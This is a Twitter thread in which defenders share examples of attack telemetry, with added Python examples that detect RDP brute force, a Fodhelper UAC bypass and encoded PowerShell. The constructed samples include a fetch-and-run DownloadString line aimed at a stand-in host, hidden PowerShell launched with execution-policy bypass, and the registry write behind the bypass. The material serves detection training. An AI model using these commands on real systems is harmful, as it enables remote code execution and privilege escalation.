New year, new Fiendish Dr. Noid, API-T
@_noid_
Blue Team peeps. I've got a favor to ask. Do you have any screenshots of adversary activity you could share with me? Redacted where necessary, of course. I'm trying to help a friend out with a presentation they're giving. The person who was supposed to help her is in the hospital.
New year, new Fiendish Dr. Noid, API-T
@_noid_
2 Feb
She's going to be talking about what adversary activity looks like. I've got plenty of screenshots from the attacker's perspective, but not much from the defenders' side of things.
New year, new Fiendish Dr. Noid, API-T
@_noid_
2 Feb
Windows perspective is ideal, as most of her students are operating in that environment.
Matthew Toussain
@0sm0s1z
2 Feb
Note the timestamps associated with the attempted login events.
Here we see a successful online password brute-forcing attack against RDP. Closer inspection of the log data would reveal the successfully authenticated account and remote IP address. pic.twitter.com/zc3bXUgqBv
New year, new Fiendish Dr. Noid, API-T
@_noid_
2 Feb
Funny enough, I'm working on a list of logon event types to watch for. One of my usual indicators is attempts at Type 2 logon from service accounts or interactive logon from workstation to workstation. Outside of Help Desk/IT, I consider it anomalous behavior most places
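The two tweets above describe what a defender looks for in the Security log: a burst of 4625 failures followed by a 4624 success from the same remote address (the RDP brute force), and interactive-type logons that should not happen (a service account at a console, or RDP from one workstation to another). The script below is an added example, not code from anyone in the thread. It runs both checks over a constructed set of 4624/4625 records (the dicts flatten the EventData fields; the hosts, accounts and addresses are invented), and it assumes a site convention that workstations are named `WS-*`.

```python
"""Added example: two detections over Windows Security logon events (4624/4625).
All events below are constructed for this example, not real log data."""
from collections import defaultdict
from datetime import datetime, timedelta

INTERACTIVE_TYPES = {2, 10, 11}   # Interactive, RemoteInteractive (RDP), CachedInteractive


def _event(event_id, ts, computer, user, logon_type, ip, workstation):
    """Flattened subset of a 4624/4625 record's EventData (constructed)."""
    return {"EventID": event_id, "TimeCreated": ts, "Computer": computer,
            "TargetUserName": user, "LogonType": logon_type,
            "IpAddress": ip, "WorkstationName": workstation}


# 12 failures in 12 seconds from one Internet address, then a success.  With NLA
# enabled, failed RDP attempts are logged as 4625 LogonType 3; the eventual
# success is 4624 LogonType 10.
SAMPLE_EVENTS = [
    _event(4625, f"2019-02-02T03:14:{i:02d}", "WS-ACCT-07", "administrator", 3,
           "203.0.113.45", "KALI")
    for i in range(12)
]
SAMPLE_EVENTS += [
    _event(4624, "2019-02-02T03:14:12", "WS-ACCT-07", "jsmith", 10, "203.0.113.45", "KALI"),
    _event(4625, "2019-02-02T08:01:00", "WS-ACCT-07", "jsmith", 10, "10.0.0.5", "WS-HR-03"),   # one typo, benign
    _event(4624, "2019-02-02T08:02:30", "WS-ACCT-07", "svc_backup", 2, "-", "WS-ACCT-07"),     # service account at console
    _event(4624, "2019-02-02T08:05:00", "WS-ACCT-07", "bob", 10, "10.0.0.5", "WS-HR-03"),       # workstation -> workstation RDP
    _event(4624, "2019-02-02T08:10:00", "WS-ACCT-07", "helpdesk1", 10, "10.0.0.9", "HELPDESK-01"),
    _event(4624, "2019-02-02T08:11:00", "WS-ACCT-07", "svc_backup", 3, "10.0.0.20", "FS01"),    # network logon, expected
]


def _ts(ev):
    return datetime.fromisoformat(ev["TimeCreated"])


def find_rdp_bruteforce(events, threshold=10, window=timedelta(minutes=5)):
    """Flag a source IP whose failed logons reach `threshold` within `window` and are
    then followed by a successful network/RDP logon from the same IP.  One finding per
    such success, naming the account that finally authenticated."""
    failures = defaultdict(list)
    findings = []
    for ev in sorted(events, key=lambda e: e["TimeCreated"]):   # ISO timestamps sort as strings
        ip = ev.get("IpAddress", "-")
        if ip in ("-", "", "127.0.0.1", "::1"):
            continue                          # console logons carry no usable address
        when = _ts(ev)
        if ev["EventID"] == 4625:
            failures[ip].append(when)
        elif ev["EventID"] == 4624 and ev["LogonType"] in (3, 10):
            recent = [t for t in failures[ip] if when - t <= window]
            if len(recent) >= threshold:
                findings.append({"ip": ip, "failures": len(recent),
                                 "first_failure": recent[0].isoformat(),
                                 "success_time": ev["TimeCreated"],
                                 "account": ev["TargetUserName"], "host": ev["Computer"]})
                failures[ip].clear()          # don't re-alert on the same burst
    return findings


def is_workstation(hostname):
    # Assumption for this example: workstations are named WS-*; adjust to your convention.
    return hostname.upper().startswith("WS-")


def find_anomalous_interactive_logons(events, service_accounts, helpdesk_hosts):
    """Flag (a) any interactive-type logon by a service account and (b) RDP logons
    between two workstations that do not originate from a help-desk host."""
    service_accounts = {a.lower() for a in service_accounts}
    helpdesk_hosts = {h.upper() for h in helpdesk_hosts}
    findings = []
    for ev in events:
        if ev["EventID"] != 4624 or ev["LogonType"] not in INTERACTIVE_TYPES:
            continue
        user, src, dst = ev["TargetUserName"].lower(), ev["WorkstationName"], ev["Computer"]
        if user in service_accounts:
            findings.append(("service-account-interactive", dst, user, ev["LogonType"]))
        elif (ev["LogonType"] == 10 and is_workstation(src) and is_workstation(dst)
              and src.upper() not in helpdesk_hosts):
            findings.append(("workstation-to-workstation", dst, user, src))
    return findings


if __name__ == "__main__":
    for f in find_rdp_bruteforce(SAMPLE_EVENTS):
        print("RDP brute force:", f)
    for f in find_anomalous_interactive_logons(SAMPLE_EVENTS, ["svc_backup"], ["HELPDESK-01"]):
        print("Anomalous logon:", f)
```

On the sample data the first check returns one finding (12 failures from 203.0.113.45, then `jsmith` authenticating) and the second returns the `svc_backup` console logon and `bob`'s RDP session from WS-HR-03; the single typo from 10.0.0.5 and the help-desk session are left alone. One caveat worth remembering when tuning the first check: with NLA in place the 4625 records for RDP arrive as LogonType 3, and on some builds the IpAddress field is `-`, in which case the TerminalServices operational logs or firewall data are needed to tie failures to a source.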
Jarno Niemela
@jarnomn
3 Feb
Here is what a Windows 10 Fodhelper UAC bypass looks like.
The payload tries to launch multiple Meterpreter stagers and then, when it succeeds, does the UAC bypass. The data is from my test environment, since I obviously can't share customer data. pic.twitter.com/qXOOLCHnfO
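For readers who want the log-side view of the Fodhelper bypass the tweet above shows: the technique writes a command under `HKCU\Software\Classes\ms-settings\Shell\Open\command` (usually with an empty `DelegateExecute` value alongside it) and then starts `fodhelper.exe`, an auto-elevating binary that runs that command at High integrity without a consent prompt. In Sysmon that is an Event 13 (registry value set) followed by an Event 1 (process create) whose parent is `fodhelper.exe`. The correlation below is an added example, not code from the thread or from any Sysmon configuration; the events are constructed (SIDs, user names and paths invented) and it assumes Sysmon's `HKU\<SID>\...` form for registry paths.

```python
"""Added example: correlating Sysmon events for the fodhelper.exe UAC bypass.
The events below are constructed for this example, not real telemetry."""
from datetime import datetime, timedelta

MS_SETTINGS_COMMAND = r"\software\classes\ms-settings\shell\open\command"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
HIVE = r"HKU\S-1-5-21-1111-2222-3333-1001"          # constructed SID for the user hive

SAMPLE_SYSMON = [
    {"EventID": 1, "UtcTime": "2019-02-03 10:00:00", "User": "CORP\\alice", "Image": PS,
     "ParentImage": r"C:\Windows\System32\cmd.exe", "IntegrityLevel": "Medium",
     "CommandLine": "powershell.exe -nop -w hidden -enc dwBoAG8AYQBtAGkA"},
    {"EventID": 13, "UtcTime": "2019-02-03 10:00:04", "User": "CORP\\alice", "Image": PS,
     "TargetObject": HIVE + r"\Software\Classes\ms-settings\Shell\Open\command\DelegateExecute",
     "Details": "(Empty)"},
    {"EventID": 13, "UtcTime": "2019-02-03 10:00:04", "User": "CORP\\alice", "Image": PS,
     "TargetObject": HIVE + r"\Software\Classes\ms-settings\Shell\Open\command\(Default)",
     "Details": r"C:\Windows\System32\cmd.exe /c powershell.exe -nop -w hidden -enc dwBoAG8AYQBtAGkA"},
    {"EventID": 1, "UtcTime": "2019-02-03 10:00:05", "User": "CORP\\alice",
     "Image": r"C:\Windows\System32\fodhelper.exe", "ParentImage": PS,
     "IntegrityLevel": "High", "CommandLine": r"C:\Windows\System32\fodhelper.exe"},
    {"EventID": 1, "UtcTime": "2019-02-03 10:00:06", "User": "CORP\\alice",
     "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\System32\fodhelper.exe", "IntegrityLevel": "High",
     "CommandLine": r"C:\Windows\System32\cmd.exe /c powershell.exe -nop -w hidden -enc dwBoAG8AYQBtAGkA"},
    # Benign: a user opening Settings normally.  fodhelper.exe is started by explorer.exe
    # and spawns no child, so no further Event 1 appears under it.
    {"EventID": 1, "UtcTime": "2019-02-03 11:30:00", "User": "CORP\\bob",
     "Image": r"C:\Windows\System32\fodhelper.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "IntegrityLevel": "High", "CommandLine": r"C:\Windows\System32\fodhelper.exe"},
]


def _t(ev):
    return datetime.strptime(ev["UtcTime"], "%Y-%m-%d %H:%M:%S")


def ms_settings_writes(events):
    """Every registry value set under the ms-settings shell\\open\\command key.
    A write here is suspicious on its own, whatever happens afterwards."""
    return [ev for ev in events
            if ev["EventID"] == 13 and MS_SETTINGS_COMMAND in ev["TargetObject"].lower()]


def find_fodhelper_bypass(events, window=timedelta(seconds=60)):
    """Correlate, per user, writes to the ms-settings command key with a later child
    process of fodhelper.exe.  One finding per child process; confidence is 'high' when
    a matching key write preceded it within `window`, 'medium' for a bare child."""
    key_writes = {}                      # user -> [(time, TargetObject, Details)]
    findings = []
    for ev in sorted(events, key=_t):
        user = ev["User"]
        if ev["EventID"] == 13 and MS_SETTINGS_COMMAND in ev["TargetObject"].lower():
            key_writes.setdefault(user, []).append((_t(ev), ev["TargetObject"], ev["Details"]))
        elif ev["EventID"] == 1 and ev["ParentImage"].lower().endswith("\\fodhelper.exe"):
            when = _t(ev)
            prior = [w for w in key_writes.get(user, [])
                     if 0 <= (when - w[0]).total_seconds() <= window.total_seconds()]
            findings.append({"user": user, "child": ev["Image"],
                             "integrity": ev["IntegrityLevel"], "command": ev["CommandLine"],
                             "registry_writes": [w[1] for w in prior],
                             "confidence": "high" if prior else "medium"})
    return findings


if __name__ == "__main__":
    for f in find_fodhelper_bypass(SAMPLE_SYSMON):
        print(f"[{f['confidence']}] {f['user']} spawned {f['child']} ({f['integrity']}) "
              f"from fodhelper.exe after {len(f['registry_writes'])} ms-settings writes")
```

On the sample this yields a single high-confidence finding for `alice` (cmd.exe at High integrity under fodhelper.exe, two preceding key writes) and nothing for `bob`. Two practical notes: Sysmon only emits Event 13 for this path if the configuration's RegistryEvent rules include it, so check that before relying on the correlation; and because the key is typically deleted again right after the elevated child starts, the matching Event 12 (key deleted) is a useful second signal. The same key is abused with other auto-elevating binaries, so matching only the `ParentImage` name in this example misses those variants while the registry check still catches the write.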
New year, new Fiendish Dr. Noid, API-T
@_noid_
3 Feb
This would pair well with the screenshots I generated of PowerShell obfuscated payloads. Thanks
Digital
@0xDigital
2 Feb
Does Emotet being executed on a user's machine count? This has actually become an interview question (showing the PowerShell encoded command) to see how an analyst would figure out what's happening (basically asking that they understand they need to decode a base64 hash). pic.twitter.com/js6aXE5beD
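The interview question above boils down to a decoding routine, so here is one as an added example (not code from the thread, and not tied to any particular Emotet sample). `powershell.exe -EncodedCommand` accepts any unambiguous prefix of the switch (`-e`, `-ec`, `-enc`, ...) and takes the base64 of the script encoded as UTF-16LE; loaders of that family commonly put a second, compressed base64 blob inside the first script, so the routine also unwraps `FromBase64String(...)` arguments and gunzips or inflates them when the bytes call for it. The sample command line is constructed inside the block by encoding a known inner script (the URL is a reserved `.invalid` name), and the literal `dwBoAG8AYQBtAGkA` is the encoding of `whoami`.

```python
"""Added example: peeling a PowerShell -EncodedCommand the way an analyst would.
The sample command line is constructed in this file, not taken from a real incident."""
import base64
import gzip
import re
import zlib

FROM_B64 = re.compile(r"FromBase64String\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)", re.I)


def extract_encoded(cmdline):
    """Return the argument of -EncodedCommand (or any prefix PowerShell accepts), or None.
    '-ExecutionPolicy' and '-ep' are not prefixes of 'encodedcommand', so they are skipped."""
    toks = cmdline.split()
    for i, tok in enumerate(toks[:-1]):
        flag = tok.lstrip("-/").lower()
        if tok[:1] in "-/" and flag and "encodedcommand".startswith(flag):
            return toks[i + 1].strip("\"'")
    return None


def decode_encoded_command(blob):
    """Base64 -> UTF-16LE text.  Re-pads '=' in case the log line was trimmed."""
    raw = base64.b64decode(blob + "=" * (-len(blob) % 4))
    return raw.decode("utf-16-le")


def _unwrap_bytes(raw):
    """Gunzip or inflate compressed payload bytes; return them unchanged otherwise."""
    if raw[:2] == b"\x1f\x8b":                    # gzip magic (GzipStream)
        return gzip.decompress(raw)
    try:
        return zlib.decompress(raw, -15)          # raw DeflateStream output, no zlib header
    except zlib.error:
        return raw


def peel(cmdline):
    """Return the script layers recovered from a process command line: layer 0 is the
    decoded -EncodedCommand, later layers are nested FromBase64String payloads."""
    blob = extract_encoded(cmdline)
    if blob is None:
        return []
    layers = [decode_encoded_command(blob)]
    for inner in FROM_B64.findall(layers[0]):
        data = _unwrap_bytes(base64.b64decode(inner))
        # a nested payload may itself be UTF-16LE text (another -enc) or plain ASCII/UTF-8
        text = data.decode("utf-16-le") if b"\x00" in data[:4] else data.decode("utf-8", "replace")
        layers.append(text)
    return layers


# --- constructed sample: gzip'd inner script, wrapped by an outer decompress-and-IEX stub
INNER_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/loader')"
_inner_b64 = base64.b64encode(gzip.compress(INNER_SCRIPT.encode())).decode()
OUTER_SCRIPT = ("$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String('" + _inner_b64 + "'));"
                "IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream("
                "$s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()")
SAMPLE_CMDLINE = ("powershell.exe -NoP -NonI -W Hidden -ExecutionPolicy Bypass -enc "
                  + base64.b64encode(OUTER_SCRIPT.encode("utf-16-le")).decode())

if __name__ == "__main__":
    for depth, layer in enumerate(peel(SAMPLE_CMDLINE)):
        print(f"--- layer {depth} ---\n{layer}")
```

Run as a script it prints the outer stub as layer 0 and the `DownloadString` one-liner as layer 1. The prefix-matching in `extract_encoded` is the detail analysts most often get wrong: `-e` is a valid spelling of `-EncodedCommand`, while `-ExecutionPolicy` is not, so a regex keyed on `-enc` alone misses some samples and one keyed on `-e` grabs the policy value.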
New year, new Fiendish Dr. Noid, API-T
@_noid_
2 Feb
That's a good one. Funny enough I was just digging through some of my encoded payloads looking for a good "If you see this, shit's happening" example
Adam ♿ 🐧
@voltagex
3 Feb
Does a home user count? mobile.twitter.com/voltagex/statu…
Ryan
@ReversingWithMe
3 Feb
lockboxx.blogspot.com/2018/02/tamuct…
Random writeup from old CTF
Not my writeup, so can't grant permission if that's a factor